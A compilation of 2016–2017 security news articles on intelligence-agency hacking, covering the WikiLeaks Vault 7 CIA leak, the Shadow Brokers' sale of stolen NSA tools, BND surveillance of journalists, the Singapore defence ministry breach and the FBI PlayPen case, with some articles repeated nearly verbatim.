WikiLeaks has obtained thousands of files allegedly originating from a CIA high-security network that details CIA hacking tools and capabilities
WikiLeaks announced on Tuesday that it has obtained thousands of files allegedly originating from a high-security network of the U.S. Central Intelligence Agency (CIA).

The huge trove of data, called “Vault 7,” exposed the hacking capabilities of the US Intelligence Agency and its internal infrastructure.

“The first full part of the series, “Year Zero”, comprises 8,761 documents and files from an isolated, high-security network situated inside the CIA’s Center for Cyber Intelligence in Langley, Virginia.” reads the announcement issued by WikiLeaks.

“Recently, the CIA lost control of the majority of its hacking arsenal including malware, viruses, trojans, weaponized “zero day” exploits, malware remote control systems and associated documentation.”

According to Wikileaks, the precious archive appears to have been circulated among former US government experts and contractors in an unauthorized manner. One of them likely provided the files to WikiLeaks.

The archive includes confidential information, malicious codes, and exploits specifically designed to target popular products from various IT companies, including Samsung, Apple, Google, and Microsoft.

The hacking tools developed by the US cyber spies can target mobile devices, desktop computers, and IoT devices such as routers and smart TVs.

The arsenal used by the Central Intelligence Agency hackers was composed of hacking tools developed by the CCI’s Engineering Development Group (EDG).

The developers at EDG are tasked with developing and testing any kind of malicious code, including implants, backdoors, exploits, Trojans and viruses.

The CIA has dozens of zero-day exploits in its arsenal that can be used to target almost any platform, from Windows and Linux PCs to Android and iOS mobile devices.

“CIA malware and hacking tools are built by EDG (Engineering Development Group), a software development group within CCI (Center for Cyber Intelligence), a department belonging to the CIA’s DDI (Directorate for Digital Innovation).” continues Wikileaks.

WikiLeaks confirmed that it will not release the tools and exploits “until a consensus emerges on the technical and political nature of the CIA’s program and how such ‘weapons’ should be analyzed, disarmed and published.”


The leaked documents also revealed that the CIA used hacking tools developed by the British intelligence agencies (GCHQ and MI5), the NSA, the FBI and also contractors.

The documents refer to a joint CIA/MI5 development of malware, dubbed Weeping Angel, that was used to compromise Samsung Smart TVs.

“The attack against Samsung smart TVs was developed in cooperation with the United Kingdom’s MI5/BTSS. After infestation, Weeping Angel places the target TV in a ‘Fake-Off’ mode, so that the owner falsely believes the TV is off when it is on. In ‘Fake-Off’ mode the TV operates as a bug, recording conversations in the room and sending them over the Internet to a covert CIA server.” continues Wikileaks.

The documents confirm that CIA hackers were able to read traffic from the most popular secure messaging apps, such as Signal, WhatsApp, and Telegram, by compromising the handset and capturing messages before encryption, rather than by breaking the apps’ encryption.

The leaked files depict a disconcerting scenario: the CIA was in possession of tools able to hack almost any platform, from modern vehicles to air-gapped systems.


WikiLeaks Exposed CIA's Hacking Tools And Capabilities Details
7.3.2017 thehackernews BigBrothers

WikiLeaks has published a massive trove of confidential documents in what appears to be the biggest ever leak involving the US Central Intelligence Agency (CIA).
WikiLeaks announced a series called Year Zero, under which the whistleblower organization will reveal details of the CIA's global covert hacking program.
As part of Year Zero, Wikileaks published its first archive, dubbed Vault 7, on Tuesday: a total of 8,761 documents weighing 513 MB, exposing information about numerous zero-day exploits developed for iOS, Android, and Microsoft's Windows operating system.
WikiLeaks claims that these leaks came from a secure network within the CIA's Center for Cyber Intelligence headquarters at Langley, Virginia.
The authenticity of such dumps can not be verified immediately, but since WikiLeaks has long track record of releasing such top secret government documents, the community and governments should take it very seriously.
CIA's Zero-Day Exploits & Ability to Bypass Encrypted Apps
According to initial analysis and the press release, the leak sheds light on the CIA's entire hacking capability, including its ability to hack smartphones and popular messaging apps, among them WhatsApp, the world's most popular messaging app.
"These techniques permit the CIA to bypass the encryption of WhatsApp, Signal, Telegram, Weibo, Confide and Cloackman by hacking the smartphones that they run on and collecting audio and message traffic before encryption is applied," WikiLeaks said.
The exploits come from a variety of sources, including partner agencies like NSA and GCHQ or private exploit traders, as well as the CIA's specialized unit in its Mobile Development Branch that develops zero-day exploits and malware for hacking smartphones, including iPhones and iPads.
"By the end of 2016, the CIA's hacking division, which formally falls under the agency's Center for Cyber Intelligence (CCI), had over 5000 registered users and had produced more than a thousand hacking systems, trojans, viruses, and other weaponized malware," WikiLeaks said.
The agency can remotely activate smartphones' cameras and microphones at will, and can capture messages before encryption is applied, WikiLeaks claims in the statement on its website.
"Weeping Angel" Attack — Hacking Smart TVs to Spy On Users
Vault 7 also details a surveillance technique — codenamed Weeping Angel — used by the agency to infiltrate smart TV's, transforming them into covert microphones.
Samsung smart TVs, which previously drew criticism for their always-on voice command system, are vulnerable to Weeping Angel hacks that place the TVs into a “Fake-Off” mode.
In Fake-Off mode, the TV owner believes it is off when it is actually on, allowing the CIA to record conversations "in the room and sending them over the Internet to a covert CIA server."
HammerDrill v2.0: A Malware to Steal Data From Air Gapped PCs
The CIA's cyberweapon arsenal also includes a cross-platform tool, dubbed Hammer Drill, that targets Windows, Linux, Solaris, macOS and other platforms, spreading through CDs/DVDs, USB drives, data hidden in images, and other techniques.
More interestingly, Hammer Drill v2.0 also added an air-gap-jumping capability, used to target computers that are isolated from the Internet and other networks and are generally believed to be the most secure computers on the planet.
Besides listing all hacking tools and operations, the documents also include instructions for using those hacking tools, tips on the configuration of Microsoft Visual Studio (which is classified as Secret/NOFORN), as well as testing notes for various hacking tools.
Some of the leaked documents even suggest that the CIA was developing tools to remotely control certain vehicle software, allowing the agency to cause "accidents" which would effectively be "nearly undetectable assassinations."
For more details on the leak, you can peruse the WikiLeaks website.


WikiLeaks Releases Details on CIA Hacking Tools

7.3.2017 securityweek BigBrothers
WikiLeaks revealed on Tuesday that it has obtained thousands of files allegedly originating from a high-security network of the U.S. Central Intelligence Agency (CIA). The leak, dubbed “Vault 7,” apparently exposes the CIA’s vast hacking capabilities.

WikiLeaks said the files come from the CIA’s Center for Cyber Intelligence (CCI) in Langley, Virginia, and they have been circulating among former U.S. government hackers and contractors. One of these individuals provided the data to the whistleblower organization, which has called it “the largest intelligence publication in history.”

According to WikiLeaks, the files, dated between 2013 and 2016, include malware and exploits targeting the products of several major tech companies, including Apple, Google, Microsoft and Samsung. The leaked tools can allegedly be used to hack mobile devices, desktop computers, routers, smart TVs and other types of systems.


These pieces of software are said to have been developed by the CCI’s Engineering Development Group (EDG). WikiLeaks said the EDG develops, tests and provides support for backdoors, exploits, Trojans, viruses and other types of malware used by the CIA.

In addition to hacking tools developed by its own people, the agency allegedly obtained tools from British intelligence agencies (GCHQ and MI5), the NSA, the FBI and cyber arms contractors. For instance, the agency is said to have collaborated with MI5 on the development of a tool designed for spying on people through Samsung smart TVs.

The CIA allegedly has dozens of zero day exploits designed for targeting devices running Android, iOS, Windows, OS X and Linux. WikiLeaks claims some of these tools even allow the agency to bypass the encryption of secure messaging apps such as Signal, WhatsApp, and Telegram.

However, this does not necessarily mean these applications have been compromised – an attacker who has root access to a mobile device can often access messages exchanged via secure IM apps without the need to break the encryption.

WikiLeaks will not release the tools and exploits “until a consensus emerges on the technical and political nature of the CIA's program and how such 'weapons' should be analyzed, disarmed and published.”

The files also appear to show that the CIA has developed tools designed for targeting the control systems of modern vehicles, multi-platform malware, and threats that add themselves to CDs and DVDs in order to jump air gaps.

Following the Edward Snowden leaks, the U.S. government has promised to disclose serious vulnerabilities that represent a high risk or affect a product that is widespread in critical infrastructure. If the files obtained by WikiLeaks are genuine, the CIA breached that commitment.


German foreign intelligence service Spied on Foreign Journalists since 1999
2.3.2017 securityaffairs BigBrothers

According to a new report from Der Spiegel, the German foreign intelligence service has spied on journalists from the BBC, the New York Times and Reuters since 1999.
The German foreign intelligence service spied on journalists from various media agencies, including the BBC, Reuters and the New York Times.


According to the German magazine Der Spiegel, at least 50 reporters were spied on by the Bundesnachrichtendienst (BND), and the agency has been carrying out surveillance activities since 1999.

“Germany’s foreign intelligence agency, the BND, apparently spied on large numbers of foreign journalists overseas over the course of several years, including employees of the BBC, Reuters and the New York Times. Critics see a massive violation of press freedoms.” reads the Der Spiegel report.

Der Spiegel obtained BND documents listing journalists’ emails, faxes, and telephone numbers.

“The document reportedly showed more than a dozen BBC journalists were being monitored via numbers at the organisation’s London headquarters and in Afghanistan.” reported the Independent.

The list also included several mobile and satellite phone numbers used by reporters at Reuters, as well as a New York Times phone number.

The Reuters numbers belong to journalists in Afghanistan, Pakistan, and Nigeria, and according to Der Spiegel, other organisations in Kuwait, Lebanon, India, Nepal, Indonesia, and Zimbabwe were also targeted by the cyber spies.

Unsurprisingly, the news agencies and broadcasters spied on by the German foreign intelligence service expressed disappointment over the revelations.

“We are disappointed to hear these claims,” a BBC spokesperson said.

“The BBC’s mission is to bring accurate news and information to people around the world, and our journalists should be able to operate freely and safely, with full protection for their sources.

“We call upon all governments to respect the operation of a free press.”

The BND declined to comment on the allegations, but clarified that every operational aspect of its activity will be discussed only with the German government and the politicians on the parliament’s intelligence oversight committee.

The report comes while the Bundestag is investigating surveillance activities conducted by the US National Security Agency (NSA) and the BND.


The Singaporean Defence Ministry was hit by a cyber attack, no secrets were exfiltrated
28.2.2017 securityaffairs BigBrothers

The Singaporean Defence Ministry confirmed that threat actors breached government systems and stole personal information belonging to its employees.
On Tuesday, the Defence Ministry confirmed that unknown hackers breached a government system and stole personal information belonging to about 850 Singapore national servicemen and employees.

Data accessed by hackers includes telephone numbers, dates of birth, and national ID numbers.

According to the Singaporean Defence Ministry the hackers were searching for official secrets.

The Singaporean Defence Ministry discovered the security breach this month; the hackers penetrated the I-net system, which provides Internet access to national servicemen and employees for their personal communications and Internet surfing.

I-net computer terminals are used in both MINDEF and Singapore Armed Forces (SAF) camps and premises. The nature of the attack suggests to investigators that the attackers were politically motivated.

According to the ministry, the hackers haven’t exfiltrated classified military information because it is not accessible from the I-net.

“Classified matters in MINDEF/SAF use a different computer system with more stringent security features and are not connected to the Internet,” the official statement published on its website stated.

“The attack on I-net appeared to be targeted and carefully planned,” it said.

“The real purpose may have been to gain access to official secrets, but this was prevented by the physical separation of I-net from our internal systems,” MINDEF added.

“We will continually strengthen our cyber defenses as the level of targeted attacks is expected to continue and rise,”

The ministry asked the Cyber Security Agency and the Government Technology Agency to extend the investigation to other government systems; fortunately, at the time I was writing, no other security breach had been discovered by the experts.

In mid-2015, the Government of Singapore announced the separation of civil servants’ work computers from the Internet in order to secure Government networks. The measure was aimed at preventing cyber attacks that could inject malware into the government email network.

The local news agency The Straits Times reported that the measure impacted some 100,000 computers.

Even before the announcement a number of ministries in Singapore, including the defence and the foreign affairs ministries, had been using separate systems to access the Internet.


The Government and national infrastructure are a privileged target of hackers; in 2014, a section of the prime minister’s website, as well as the website of the presidential residence, were targeted by unknown attackers.

In December 2015, experts at FireEye discovered a stealthy botnet relying on a backdoor called LATENTBOT that compromised companies around the world, including in Singapore. In January, a new variant of the infamous Tinba banking trojan emerged in the wild and targeted financial institutions in the Asia Pacific region, including Singapore.



Privacy groups claim FBI hacking operation in the PlayPen case was unconstitutional
11.2.2017 securityaffairs BigBrothers

According to privacy groups, the FBI search warrant used to hack into thousands of computers around the world in the PlayPen case was unconstitutional.
Privacy groups are claiming the FBI hacking campaign against the Playpen child pornography community violated international law.

According to the court documents, the FBI monitored a Tor hidden service named Playpen, a bulletin board launched in August 2014 and used mainly for “the advertisement and distribution of child pornography.”

In one year, the Playpen hidden service reached over 200,000 users and over 117,000 total posts, mainly containing child pornography. Law enforcement identified nearly 1300 IP addresses belonging to visitors.


According to Motherboard, the server running Playpen was seized by the FBI from a web host in North Carolina, and law enforcement then operated the server to track its visitors. The agents used a network investigative technique (NIT) to obtain the IP addresses of Playpen users.

The Feds hacked 8,700 computers in 120 countries based on a single warrant, a procedure considered unconstitutional by privacy advocates. US law enforcement expanded its extraterritorial surveillance capabilities without the consent of the states hosting the computers targeted by its malware.

“The FBI’s hacking operation in this case represents an enormous expansion of its extraterritorial surveillance capabilities — affecting thousands of computers in over a hundred countries around the world.” wrote Scarlet Kim, a legal officer with U.K.-based Privacy International. “How will other countries react to the FBI hacking in their jurisdictions without prior consent?”

What if a foreign intelligence agency or law enforcement body had carried out a similar hacking operation that compromised the computers of US citizens?

Last week, the U.K.-based Privacy International group, the Electronic Frontier Foundation (EFF) and the American Civil Liberties Union of Massachusetts filed briefs in a lawsuit involving the FBI’s Playpen investigation.

The privacy groups filed briefs in a case involving Alex Levin, one of the suspects in the FBI’s Playpen investigation, who was identified by the Feds thanks to the NIT (network investigative technique).

The privacy advocates claim that the single warrant used by the FBI to conduct the hacking operations is not valid.

According to the EFF and ACLU groups, the warrant was invalid because the U.S. Constitution prohibits this kind of search on US citizens.

“No one questions the need for the FBI to investigate serious crimes like child pornography. But even serious crimes can’t justify throwing out our basic constitutional principles. Here, on the basis of a single warrant, the FBI searched 8,000 computers located all over the world,” EFF attorney Mark Rumold wrote in a blog post. “If the FBI tried to get a single warrant to search 8,000 houses, such a request would unquestionably be denied.”

The EFF considers the use of a single warrant to hack into such a huge number of computers across the world unconstitutional.

On the other side, U.S. attorneys believe the Feds followed proper procedures in obtaining the warrant; there was no other way to unmask the criminals involved in the PlayPen case.


Government Contractor Indicted Over Theft of Secret Documents

9.2.2017 securityweek BigBrothers
Harold Thomas Martin III, the former U.S. government contractor arrested last year for theft of classified material, was indicted on Wednesday by a federal grand jury.

Martin, age 52, of Glen Burnie, Maryland, had worked as a security contractor for several government agencies between 1993 and 2016 through at least seven private companies. Similar to the whistleblower Edward Snowden, he worked at the National Security Agency (NSA) while employed by intelligence contractor Booz Allen Hamilton.

According to authorities, Martin held Top Secret and Sensitive Compartmented Information (SCI) clearances, which provided him access to classified government computer systems, programs and information.

The indictment alleges that Martin stole vast amounts of classified material between 1996 and August 2016, when he was arrested. The files, including ones containing information that could cause serious damage to national security, were found in his home and car.

Investigators said the man had stolen 50 terabytes of files, including secret, top-secret and SCI documents related to the NSA, the Cyber Command (USCYBERCOM), the National Reconnaissance Office (NRO), and the Central Intelligence Agency (CIA).

“The indictment alleges that Martin knew that the stolen documents contained classified information that related to the national defense and that he was never authorized to retain these documents at his residence or in his vehicle,” said the Justice Department.

Martin has been indicted on 20 counts of willful retention of national defense information and he faces up to 10 years in prison for each count.

While the suspect’s attorneys have not made any comments recently, The Washington Post reported that they had previously claimed Martin was taking documents home in an effort to become better in his job and he did not intend to provide any information to foreign governments.

At one point, some reports linked Martin to Shadow Brokers, the group that offered to sell exploits and tools allegedly stolen from the NSA-linked cyber espionage team known as the Equation Group.


President Obama commutes Chelsea Manning sentence
18.1.2017 securityaffairs BigBrothers
President Barack Obama has commuted Chelsea Manning’s sentence for leaking classified documents to Wikileaks in 2010. Manning will be released on May 17th.
President Barack Obama took a historic decision: he has commuted Chelsea Manning’s sentence for leaking classified documents to Wikileaks in 2010. The news was reported by The New York Times; Manning is due to be released on May 17th.

Chelsea Manning, born Bradley Manning, was sentenced to 35 years in 2013 for passing diplomatic cables to the anti-secrecy group Wikileaks while serving in the US Army.


The data leak was one of the largest breaches of classified documents in the history of the United States.

At the time of the data leak, Bradley Manning was serving as an intelligence analyst in Iraq. Manning provided more than 700,000 documents to WikiLeaks; the huge trove includes the video of a 2007 airstrike in Baghdad that caused the death of two Reuters employees.

Recently, Wikileaks announced Assange’s intention to agree to US extradition if Obama granted Manning clemency.

WikiLeaks (@wikileaks), 12 Jan 2017: “If Obama grants Manning clemency Assange will agree to US extradition despite clear unconstitutionality of DoJ case” https://twitter.com/wikileaks/status/765626997057921025

WikiLeaks (@wikileaks), 17 Jan 2017: Assange: "Thank you to everyone who campaigned for Chelsea Manning's clemency. Your courage & determination made the impossible possible."

“Obama may well have just saved Chelsea Manning’s life,” commented Sarah Harrison, who has defended Manning as Acting Director of the Courage nonprofit. “Freeing her is clearly and unambiguously the right thing to do.”

She nevertheless reiterated her criticism of President Obama’s decision to prosecute Manning under the Espionage Act.

“Today’s news will not make good the harm done on Obama’s watch,” Harrison added. “Chelsea’s conviction under the Espionage Act and 35-year sentence set a terrible precedent that is left entirely intact by this commutation. Who knows what Donald Trump will do with this precedent, and these powers, that Obama has left him?”
Manning’s commutation was part of a larger round of clemency by the US Government that resulted in 209 commutations and 64 pardons. President Obama issued 1,385 grants of commutation during his administration, more than any previous president.



ShadowBrokers exits releasing another arsenal of tools to hack Windows
13.1.2017 securityaffairs BigBrothers

The ShadowBrokers hacking group that broke into the NSA arsenal and stole its hacking tools is signing off, leaving a gift to the security community.
The mysterious hacking group calling themselves “The Shadow Brokers” has apparently decided to put an end to their failed attempts to sell exploits and hacking tools they claimed to have stolen from the NSA-linked Equation Group.
A few days ago the notorious hacker group Shadow Brokers announced the sale of an archive of Windows exploits and hacking tools stolen from the NSA-linked Equation group.


The ShadowBrokers is the hacker crew that leaked a portion of the arsenal of the NSA-Linked Equation Group, a database containing hacking tools and exploits.

In October 2016, the hackers leaked a dump containing a list of servers that were hacked by the NSA-linked group known as Equation Group.

The Equation Group compromised these targets using the hacking tools codenamed INTONATION and PITCHIMPAIR. The ShadowBrokers provided links to two distinct PGP-encrypted archives: the first was offered for free as proof of the hack (its passphrase was ‘auctioned’), while for the second the group requested 1 million BTC.

The first archive contained roughly 300MB of data, including firewall exploits, hacking tools, and scripts with cryptonyms like BANANAUSURPER, BLATSTING, and BUZZDIRECTION.

The Equation Group’s hackers targeted products made by Cisco, Fortigate, Juniper, TOPSEC, and Watchguard.

In early October, the ShadowBrokers complained that no one seemed to be bidding on their precious archive; an alleged member of the group expressed frustration at the lack of interest in ponying up bitcoins to release the full NSA data dump.

In December 2016, the group announced the launch of a crowdfunding campaign for the stolen arsenal because its auction received offers for less than two bitcoins.

Later in December 2016, the group changed its sales model, offering the NSA’s hacking arsenal for direct sale on an underground website.

Now the group has decided to exit the scene; according to a message published on the website it used for direct sales of the hacking tools, the hackers will go dark because continuing their activities is too risky.

The group explained that their main goal was the sale of the stolen hacking tools and exploits, but no one has bought them.

The Shadow Brokers crew published a Bitcoin address, explaining that they would return if someone paid 10,000 Bitcoins for the exploits; the offer will remain valid indefinitely.

Before leaving the cyber arena, the group decided to release some gifts: a collection of 58 Windows hacking tools, which are reportedly able to evade detection by security solutions. The archive was made available on the group’s website on ZeroNet:

https://onlyzero.net/theshadowbrokers.bit


Stolen NSA "Windows Hacking Tools" Now Up For Sale!
11.1.2017 thehackernews BigBrothers
The Shadow Brokers who previously stole and leaked a portion of the NSA hacking tools and exploits is back with a Bang!
The hacking group is now selling another package of hacking tools, “Equation Group Windows Warez,” which includes Windows exploits and antivirus bypass tools, stolen from the NSA-linked hacking unit, The Equation Group.
For those unfamiliar with the topic, The Shadow Brokers is a notorious group of black-hat hackers who, in August 2016, leaked exploits, security vulnerabilities, and "powerful espionage tools" created by The Equation Group.


On Saturday, the Shadow Brokers posted a message on their ZeroNet based website, announcing the sale of the entire "Windows Warez" collection for 750 Bitcoin (around US$678,630).
The data dump contains many Windows hacking tools, categorized as follows:
Fuzzing tools (used to discover errors and security loopholes)
Exploit Framework
Network Implants
Remote Administration Tools (RAT)
Remote Code Execution Exploits for IIS, RDP, RPC, SMB Protocols (Some Zero-Days)
SMB BackDoor (Implant)
Interestingly, the Remote Administration Tool (RAT) "DanderSpritz" included in the list is the one previously leaked in the NSA's documents revealed by Edward Snowden.


Besides this, malware researcher Jacob Williams analyzed the archive of "screenshots and output of the find command across the dump" provided by the hackers as evidence of legitimacy, and estimated that the tools may also include a Fully Undetectable Malware (FUD) toolkit.

The FUD toolkit might have an ability to "evade/bypass personal security products," such as Avira, Avast, Dr.Web, ESET Antivirus, Comodo, McAfee Antivirus, Microsoft Essential, Panda, Symantec, Trend Micro and Kaspersky Antivirus.
The buyers can purchase the entire database of hacking tools that The Equation Group used against various countries to expand its espionage operations.
In August, the Shadow Brokers announced an auction attempting to sell the complete set of tools to the highest bidder, but the group canceled their auction in October due to little or no response on their public sale.
But now that the group has put Windows hacking tools up for sale, the chances are that hackers and espionage groups will be interested in buying them.



ShadowBrokers offers for sale the stolen NSA Windows Hacking Tools
11.1.2017 securityaffairs BigBrothers
The ShadowBrokers, the hacker crew that stole the arsenal of the NSA-linked Equation Group, is offering the stolen NSA Windows hacking tools for sale.
The ShadowBrokers is the hacker crew that leaked a portion of the arsenal of the NSA-Linked Equation Group, a precious archive containing hacking tools and exploits.

At the end of October, the hackers leaked a fresh dump containing a list of servers that were hacked by the NSA-linked group known as Equation Group.

The Equation Group compromised these targets using the hacking tools codenamed INTONATION and PITCHIMPAIR. The ShadowBrokers provided links to two distinct PGP-encrypted archives: the first was offered for free as proof of the hack (its passphrase was ‘auctioned’), while for the second the group requested 1 million BTC.

The first archive contained roughly 300MB of data, including firewall exploits, hacking tools, and scripts with cryptonyms like BANANAUSURPER, BLATSTING, and BUZZDIRECTION.

The security researcher Mustafa Al-Bassam published an interesting post that lists all the exploits, implants, and tools for hacking firewalls (“Firewall Operations”) included in the dump.

The Equation Group’s hackers targeted products made by Cisco, Fortigate, Juniper, TOPSEC, and Watchguard.

The majority of the files are at least three years old; the newest timestamp dates to October 2013.

In early October, the ShadowBrokers complained that no one seemed to be bidding on their precious archive; an alleged member of the group expressed frustration at the lack of interest in ponying up bitcoins to release the full NSA data dump.

In early December 2016, the group announced the launch of a crowdfunding campaign for the stolen arsenal because its auction had received offers for less than two bitcoins.

We last heard from the Shadow Brokers in December 2016, when they changed their sales model, offering the NSA’s hacking arsenal for direct sale on an underground website.

The hacking group is back and now it is selling another package of hacking tools, “Equation Group Windows Warez.” The new archive includes a collection of Windows exploits and tools to evade detection of antivirus solutions.

One of the tools, the Remote Administration Tool (RAT) “DanderSpritz,” was previously mentioned in the collection of documents leaked by Edward Snowden.

The group posted a message on their website on the ZeroNet, announcing the sale of the entire “Windows Warez” archive for 750 Bitcoin (around US$678,630).

The data dump offered for sale contains several hacking tools grouped in the following categories:

Fuzzing tools (used to discover errors and security loopholes)
Exploit Framework
Network Implants
Remote Administration Tools (RAT)
Remote Code Execution Exploits for IIS, RDP, RPC, SMB Protocols (Some Zero-Days)
SMB BackDoor (Implant)
The malware researcher Jacob Williams published an analysis of the archive of “screenshots and output of the find command across the dump” provided by the ShadowBrokers. Williams started by searching for information on the term “Psp_Avoidance,” which appears in one of the screenshots published by the group.

Searching Google for the term “psp computer network operations,” the researcher got back as the fifth result a page from ManTech. The page details the ACTP CNO Programmer Course, and the course documentation indicates that PSP is an acronym for “Personal Security Product.”

“So, circling back around, what is Psp_Avoidance? Obviously, we don’t know – but if the acronym is correct, it would seem to be software built to evade personal security products, which directory listings suggest (as does ManTech) are antivirus programs.” wrote the expert.
“Should you run antivirus products? Sure. At Rendition Infosec we tell customers that operating without AV is like driving a car with no airbags. But this dump suggests that advanced attackers have mitigations for antivirus products – a sobering reality for organizations without defense in depth.”
The only certainty at this moment is that a powerful arsenal is up for sale, including hacking tools that could be used by a threat actor in the wild for large-scale espionage campaigns.

But now that the group has put Windows hacking tools up for sale, the chances are that hackers and espionage groups will be interested in buying them.


The Shadow Brokers are offering the NSA arsenal for direct sale
16.12.2016 securityaffairs BigBrothers

The Shadow Brokers group has changed the model of sale, it has put up the NSA’s hacking arsenal for direct sale on an underground website.
The Shadow Brokers – Summary of the events

We last saw the notorious hacker group at the end of October, when the hackers leaked a fresh dump containing a list of servers that were hacked by the NSA-linked group known as Equation Group.

The Equation Group compromised these targets using the hacking tools codenamed INTONATION and PITCHIMPAIR. The ShadowBrokers provided links to two distinct PGP-encrypted archives: the first was offered for free as proof of the hack (its passphrase was ‘auctioned’), while for the second the group requested 1 million BTC.
The first archive contained roughly 300MB of data, including firewall exploits, hacking tools, and scripts with cryptonyms like BANANAUSURPER, BLATSTING, and BUZZDIRECTION.
The security researcher Mustafa Al-Bassam published an interesting post that lists all the exploits, implants, and tools for hacking firewalls (“Firewall Operations”) included in the dump.

The Equation Group’s hackers targeted products made by Cisco, Fortigate, Juniper, TOPSEC, and Watchguard.

The majority of the files are at least three years old; the newest timestamp dates to October 2013.

In early October, the ShadowBrokers complained that no one seemed to be bidding on their precious archive; an alleged member of the group expressed frustration at the lack of interest in ponying up bitcoins to release the full NSA data dump.

A couple of weeks ago, the group announced the launch of a crowdfunding campaign for the stolen arsenal because its auction had received offers for less than two bitcoins.

The group is believed to be behind the high-profile cyber theft of NSA hacking tools and exploits, which sparked a larger debate on the Internet about the abilities of US intelligence agencies and their own security.
Back to the present

Now, once again, the group has changed the model of sale, it has put up the NSA’s hacking arsenal for direct sale on an underground website.

The website also hosts a file signed with the cryptographic key of The Shadow Brokers, confirming the group’s intent to sell the NSA arsenal directly to buyers, item by item.

Someone using the Boceffus Cleetus online moniker published a post on Medium titled “Are the Shadow Brokers selling NSA tools on ZeroNet?” announcing that the Shadow Brokers hackers are now offering for sale the “NSA tools individually.”

Boceffus Cleetus (@CleetusBocefus), 14 Dec 2016: “I just published ‘Are the Shadow Brokers selling NSA tools on ZeroNet?’” https://medium.com/p/are-the-shadow-brokers-selling-nsa-tools-on-zeronet-6c335891d62a

ZeroNet is a decentralized network of peer-to-peer users for hosting websites.

“ZeroNet uses bitcoin cryptography and the BitTorrent network. The BitTorrent website Play hosts a magnet link repository on ZeroNet, which links to copyrighted content. There is a Reddit community which offers support for ZeroNet.” states Wikipedia.

“Well howdy partners! I don’t wanna be getting arrested for passing on fake news and all. I rekon [sic] I ain’t no security professional but I am whutcha might call a ZeroNet enthusiast,” Cleetus writes. ZeroNet is a platform for hosting websites using blockchain and BitTorrent technology.

“Those dastardly ole shadow brokers have themselves a zite on ZeroNet. Yep and fars as I can tell they appears to be sellin NSA tools individually now,” added Cleetus.

The website includes a list of the products available for sale as explained by Joseph Cox from Motherboard.

The items are classified by type; the list includes “exploits,” “trojans,” and “implants.”


“The site includes a long list of supposed items for sale, with names like ENVOYTOMATO, EGGBASKET, and YELLOWSPIRIT. Each is sorted into a type, such as “implant,” “trojan,” and “exploit,” and comes with a price tag between 1 and 100 bitcoins ($780—$78,000). Customers can purchase the whole lot for 1000 bitcoins ($780,000).” states the post published on Motherboard.

“The site also lets visitors download a selection of screenshots and files related to each item. Along with those is a file signed with a PGP key with an identical fingerprint to that linked to the original Shadow Brokers dump of exploits from August. This newly uncovered file was apparently signed on 1 September; a different date to any of The Shadow Brokers’ previously signed messages.”

“If you like, you email TheShadowBrokers with name of Warez [the item] you want make purchase,” a message on the site reads. “TheShadowBrokers emailing you back bitcoin address. You make payment. TheShadowBrokers emailing you link + decryption password. Files as always being signed,” states the message on the website.


The Shadow Brokers are offering the NSA arsenal for direct sale
15.12.2016 securityaffairs
BigBrothers

The Shadow Brokers group has changed its sales model: it has put the NSA’s hacking arsenal up for direct sale on an underground website.
The Shadow Brokers – Summary of the events

We last saw the notorious hacker group at the end of October, when it leaked a fresh dump containing a list of servers that had been hacked by the NSA-linked group known as the Equation Group.

The Equation Group compromised these targets using the hacking tools codenamed INTONATION and PITCHIMPAIR. The Shadow Brokers provided links to two distinct PGP-encrypted archives: the first was offered for free as proof of the hack (its passphrase was ‘auctioned’), while for the second the group requested 1 million BTC.
The first archive contained roughly 300 MB of data, including firewall exploits, hacking tools, and scripts with cryptonyms like BANANAUSURPER, BLATSTING, and BUZZDIRECTION.
The security researcher Mustafa Al-Bassam published an interesting post that lists all the exploits, implants, and tools for hacking firewalls (“Firewall Operations”) included in the dump.

The Equation Group’s hackers targeted products made by Cisco, Fortigate, Juniper, TOPSEC, and Watchguard.

The majority of the files are at least three years old; the newest timestamp dates to October 2013.

In early October, TheShadowBrokers complained that no one seemed to be bidding on their precious archive: an alleged member of the hacker group expressed his frustration at the lack of interest in ponying up bitcoins to release the full NSA data dump.

A couple of weeks earlier, the group had announced the launch of a crowdfunding campaign for the stolen arsenal because its auction had received offers totalling less than two bitcoins.

The hacker group is believed to be behind the high-profile cyber theft of NSA hacking tools and exploits, a theft that sparked a larger debate on the Internet concerning the abilities of US intelligence agencies and their own security.
Back to the present

Now, once again, the group has changed its sales model: it has put the NSA’s hacking arsenal up for direct sale on an underground website.

The website hosts a file signed with the cryptographic key of The Shadow Brokers, confirming the group’s intent to sell the entire NSA arsenal directly to buyers, one item at a time.

Someone using the Boceffus Cleetus online moniker published a post on Medium titled “Are the Shadow Brokers selling NSA tools on ZeroNet?” announcing that the Shadow Brokers hackers are now offering for sale the “NSA tools individually.”

Boceffus Cleetus @CleetusBocefus
I just published “Are the Shadow Brokers selling NSA tools on ZeroNet?” https://medium.com/p/are-the-shadow-brokers-selling-nsa-tools-on-zeronet-6c335891d62a …
11:35 - 14 Dec 2016
ZeroNet is a decentralized network of peer-to-peer users for hosting websites.

“ZeroNet uses bitcoin cryptography and the BitTorrent network. The BitTorrent website Play hosts a magnet link repository on ZeroNet, which links to copyrighted content. There is a Reddit community which offers support for ZeroNet,” states Wikipedia.

“Well howdy partners! I don’t wanna be getting arrested for passing on fake news and all. I rekon [sic] I ain’t no security professional but I am whutcha might call a ZeroNet enthusiast,” Cleetus writes. ZeroNet is a platform for hosting websites using blockchain and BitTorrent technology.

“Those dastardly ole shadow brokers have themselves a zite on ZeroNet. Yep and fars as I can tell they appears to be sellin NSA tools individually now,” added Cleetus.

The website includes a list of the products available for sale, as explained by Joseph Cox of Motherboard.

The items are classified by type; the list includes “exploits,” “Trojans,” and “implants.”

Shadow Brokers NSA arsenal

“The site includes a long list of supposed items for sale, with names like ENVOYTOMATO, EGGBASKET, and YELLOWSPIRIT. Each is sorted into a type, such as “implant,” “trojan,” and “exploit,” and comes with a price tag between 1 and 100 bitcoins ($780—$78,000). Customers can purchase the whole lot for 1000 bitcoins ($780,000).” states the post published on Motherboard.

“The site also lets visitors download a selection of screenshots and files related to each item. Along with those is a file signed with a PGP key with an identical fingerprint to that linked to the original Shadow Brokers dump of exploits from August. This newly uncovered file was apparently signed on 1 September; a different date to any of The Shadow Brokers’ previously signed messages.”

“If you like, you email TheShadowBrokers with name of Warez [the item] you want make purchase,” a message on the site reads. “TheShadowBrokers emailing you back bitcoin address. You make payment. TheShadowBrokers emailing you link + decryption password. Files as always being signed.”


After Failed Auction, Shadow Brokers Opens NSA Hacking Tools for Direct Sales
15.12.2016 thehackernews
BigBrothers
